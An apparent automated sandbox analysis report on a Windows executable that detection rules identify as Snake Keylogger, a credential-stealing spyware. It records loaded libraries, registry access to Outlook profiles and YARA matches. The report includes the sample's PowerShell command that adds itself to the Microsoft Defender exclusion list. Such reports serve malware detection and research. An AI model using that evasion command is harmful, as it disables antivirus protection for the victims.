Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FA29E0	3_2_00FA29E0
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FA69A0	3_2_00FA69A0
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FAEAA8	3_2_00FAEAA8
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FACA58	3_2_00FACA58
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FAFBB7	3_2_00FAFBB7
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FA9DE0	3_2_00FA9DE0
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FACD28	3_2_00FACD28
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FA3E09	3_2_00FA3E09
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FACFF7	3_2_00FACFF7
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FA6FC8	3_2_00FA6FC8
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FAF759	3_2_00FAF759
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Code function: 3_2_00FAEA9B	3_2_00FAEA9B

Source: M2AB8BeHc4.exe, 00000000.00000000.1699391460.00000000004C2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamevleo.exe> vs M2AB8BeHc4.exe
Source: M2AB8BeHc4.exe, 00000000.00000002.1734839883.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs M2AB8BeHc4.exe
Source: M2AB8BeHc4.exe, 00000000.00000002.1743357988.000000000B660000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs M2AB8BeHc4.exe
Source: M2AB8BeHc4.exe, 00000000.00000002.1736180528.0000000002B25000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs M2AB8BeHc4.exe
Source: M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs M2AB8BeHc4.exe
Source: M2AB8BeHc4.exe, 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs M2AB8BeHc4.exe
Source: M2AB8BeHc4.exe, 00000003.00000002.4170646948.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs M2AB8BeHc4.exe
Source: M2AB8BeHc4.exe, 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs M2AB8BeHc4.exe
Source: M2AB8BeHc4.exe	Binary or memory string: OriginalFilenamevleo.exe> vs M2AB8BeHc4.exe

Source: M2AB8BeHc4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: M2AB8BeHc4.exe PID: 6520, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: M2AB8BeHc4.exe PID: 2720, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: M2AB8BeHc4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, vWr7qZvtpPUKNcvnsX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, vWr7qZvtpPUKNcvnsX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, aarSSMVkWAmtKa6FX3.cs	Security API names: _0020.SetAccessControl
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, aarSSMVkWAmtKa6FX3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.M2AB8BeHc4.exe.b660000.4.raw.unpack, aarSSMVkWAmtKa6FX3.cs	Security API names: _0020.AddAccessRule
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, vWr7qZvtpPUKNcvnsX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, aarSSMVkWAmtKa6FX3.cs	Security API names: _0020.SetAccessControl
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, aarSSMVkWAmtKa6FX3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, aarSSMVkWAmtKa6FX3.cs	Security API names: _0020.AddAccessRule
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, aarSSMVkWAmtKa6FX3.cs	Security API names: _0020.SetAccessControl
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, aarSSMVkWAmtKa6FX3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, aarSSMVkWAmtKa6FX3.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@3/3

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\M2AB8BeHc4.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x20j5onh.12m.ps1

Jump to behavior

Source: M2AB8BeHc4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: M2AB8BeHc4.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: M2AB8BeHc4.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\M2AB8BeHc4.exe "C:\Users\user\Desktop\M2AB8BeHc4.exe"
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe"
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process created: C:\Users\user\Desktop\M2AB8BeHc4.exe "C:\Users\user\Desktop\M2AB8BeHc4.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe"	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process created: C:\Users\user\Desktop\M2AB8BeHc4.exe "C:\Users\user\Desktop\M2AB8BeHc4.exe"	Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: M2AB8BeHc4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: M2AB8BeHc4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

